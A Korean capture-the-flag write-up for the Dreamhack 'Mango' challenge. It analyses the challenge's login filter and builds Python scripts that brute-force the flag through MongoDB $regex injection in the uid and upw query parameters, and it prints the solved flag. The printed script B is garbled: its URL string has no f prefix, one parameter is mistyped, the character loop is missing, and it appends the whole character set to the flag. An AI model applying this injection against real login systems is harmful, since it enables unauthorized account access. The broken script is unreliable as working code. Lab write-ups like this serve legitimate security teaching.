[Dreamhack] Mango 드림핵 워게임 문제 풀이

3 - 1 - 1. Mango 취약점 분석 실습

 

 

 

3 - 1 - 1. Mango 취약점 분석 실습

1. 문제 파일 다운로드 및 문제 확인

 

 

 

2. 문제 파일 중 package.json 파일을 열어 코드 분석

별다른 특이 분석점이 존재하지 않음

 

 

 

3. 문제 파일 중 main.js 파일을 열어 코드 분석

+ << Line 1 ~ 6 >>

: 이용자가 설정한 쿼리값을 반환하는 코드

 

 

+ << Line 8 ~ 18 >>

: admi, admin, dh 단어들을 필터링  -->  admin 을 검색했을 때 바로 정답이 노출되는 것을 방지하기 위함

 

 

+ << Line 27 ~ 33 >>

: userid 와 password 로 검색했을 때, 필터링 함수를 실행

 

+ << Line 33 ~ 34 >>

: 로그인 성공 = 데이터베이스에서의 값 검색 성공

 

+ << Line 35 ~ 36 >>

: 위의 과정처럼 필터링 함수를 실행했음에도 해당 결과가 없다면 undefined 출력

 

 

+ << Line 41 ~ 45 >>

: 초기의 빈 페이지에서 출력할 내용을 결정하는 코드

: Payload 생성 = 공격을 위한 임의 데이터 삽입

 

 

 

4. 문제의 접속 정보 확인 후 안내된 링크인 http://host3.dreamhack.games:14635 로 접속

 

 

 

 

5. 공격을 실행하기 위한 코드 A(for 문 사용) 생성

+ << Line 3 >>

: 공격 대상을 설정해주는 코드로, 공격 대상은 기본 접속 정보에서 안내된 링크와 동일함

 

+ << Line 2 >>

: FLAG 에 숫자와 문자를 모두 포함하여 출력하기 위한 코드

string.digits	string.ascii_letters
숫자를 포함하여 출력	문자를 포함하여 출력

 

+ << Line 7 ~ 8 >>

: Flag가 총 32자리이므로 프로그램을 32번 실행하기 위한 코드

 

+ << Line 9 ~ 10 >>

: Payload를 삽입하면 그에 대한 응답을 response 로 받아주기 위한 코드로, 응답이 admin일 경우 Flag를 출력

 

 

+ + 주의!

Line 9의 URL에서 { 가 1개가 아니라 2개인 이유?

-->  Line 9의 경우와 같이 URL 앞에 'f' 문자가 존재하는 경우 { 기호 2개가 { 기호 1개로 인식된다.

 

 

 

6. 생성한 코드 A 실행  -->  Flag가 여러 번에 걸쳐 출력되는 것을 확인

최종 Flag는 DH{89e50fa6fafe2604e33c0ba05843d3df}

 

 

 

7. 공격을 실행하기 위한 코드 B(while 문 사용) 생성

import requests, string

HOST = "http://host3.dreamhack.games:9560/"
GET_FLAG = string.digits + string.ascii_letters
flag=""

while True:
        response = requests.get("{HOST}/login?uid[$regex]=ad.in&upw[&regex]=D.{{flag}{ch}")
        if response.text=="admin":
            flag += GET_FLAG
            break
print('DH{'+flag+'}')

 

 

 

8. 생성한 코드 B 실행  -->  Flag가 여러 번에 걸쳐 출력되는 것을 확인